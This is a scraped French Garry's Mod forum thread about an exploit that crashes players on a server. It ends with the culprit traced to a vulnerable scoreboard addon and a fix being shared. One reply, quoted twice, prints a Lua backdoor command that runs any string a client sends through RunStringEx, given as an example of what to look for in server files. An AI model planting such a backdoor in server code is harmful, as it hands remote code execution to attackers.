- Initiateur de la discussion
A!ex
Geek suprême
- Score réaction
- 87
51.254.57.60:27280
c'plus pratique que de payer une DLL a 40 euros je confirmeHoper à dit:cac se fais bypass en 1 ligne
exploitable ? tu ne confond pas plutôt avec les qu'elle que problèmes de false positif plutôt ? ou son autre addon de délire de hitbox la ?ImWolfPlays à dit:Commencer par retirer LAC, vieil anti cheat de merde exploitable jusqu'au sang
Il tourne sur citizen hack. Très mauvais à savoirYoh Sambre ♪ à dit:exploitable ? tu ne confond pas plutôt avec les qu'elle que problèmes de false positif plutôt ? ou son autre addon de délire de hitbox la ?
hein ? , tu parle de la version leak complétement obsolète ?ImWolfPlays à dit:Il tourne sur citizen hack. Très mauvais à savoir
apparement il a pas de leak, donc nostrip est pas "permanente" un reboot et puis voila, nan c'est juste un exploit de script en faite, faut trouver lequelAoi à dit:Salut pour ton problème le mec qui utilise le menu d'exploit peut contourner tout CAC car peut être il a à un bypass external etc et pour le problème de il fait crash les joueurs c'est peut être simple il peut avoir une backdoor dans un de tes addon mais une backdoor bien cacher sa peut être dans un de tes fichiers ou peut être il ta donner la commande la et tu la mit dans ta console (ulx luarun util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end) ) alors se ci dit cherche dans tout tes fichiers serveur .
"tout cac" ..ca me rappelle les bypass qui permettais de cheat 5 a 10 mn avant de prendre un ban , bref il s'agit juste d'un random qui a trouver un addon exploitable hein , juste pour la forme j'ai demander pourquoi il s'attaquer pas a d'autre serveur et clairement tu sentais que le mec étais limiterAoi à dit:Salut pour ton problème le mec qui utilise le menu d'exploit peut contourner tout CAC
Non, malheureusement ce n'est pas saAoi à dit:Salut pour ton problème le mec qui utilise le menu d'exploit peut contourner tout CAC car peut être il a à un bypass external etc et pour le problème de il fait crash les joueurs c'est peut être simple il peut avoir une backdoor dans un de tes addon mais une backdoor bien cacher sa peut être dans un de tes fichiers ou peut être il ta donner la commande la et tu la mit dans ta console (ulx luarun util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end) ) alors se ci dit cherche dans tout tes fichiers serveur .
Yoh Sambre ♪ à dit:"tout cac" ..ca me rappelle les bypass qui permettais de cheat 5 a 10 mn avant de prendre un ban , bref il s'agit juste d'un random qui a trouver un addon exploitable hein , juste pour la forme j'ai demander pourquoi il s'attaquer pas a d'autre serveur et clairement tu sentais que le mec étais limiter
l'addon va être patch avec le fix de @Makss il suffit d’être patient et attendre que le dev soit au courantLenovo à dit:Présente la solution pour les autres on sait jamais
Abah pour aller encore plus viteLenovo à dit:yep je lui ai parlé steam pour lui demander
Tu t'es trompé de net non ?Makss à dit:Abah pour aller encore plus vite
PS: C'est pas testé pis je trouve que le scoreboard est mal codé
Tu n'as rien vuslownls à dit:Tu t'es trompé de net non ?
Tu t'es encore trompé non ?Makss à dit:Tu n'as rien vu
(fix update)
(t'es le meilleur)
J'ai bu.slownls à dit:Tu t'es encore trompé non ?
Des géniesalex74140 à dit:L'Exploit venait du "ETET-SCOREBOARD" merci à @slownls @Makss et @Yoh Sambre ♪
Ben comme d’habitude quoiYoh Sambre ♪ à dit:j'ai rien branler , j'suis crédité
bawouai normal
Tu sais rien faire mais toute le monde te tagYoh Sambre ♪ à dit:j'ai rien branler , j'suis crédité
bawouai normal
Soit pas jalouLap3che à dit:Tu sais rien faire mais toute le monde te tag
Té tro une starYoh Sambre ♪ à dit:j'ai rien branler , j'suis crédité
bawouai normal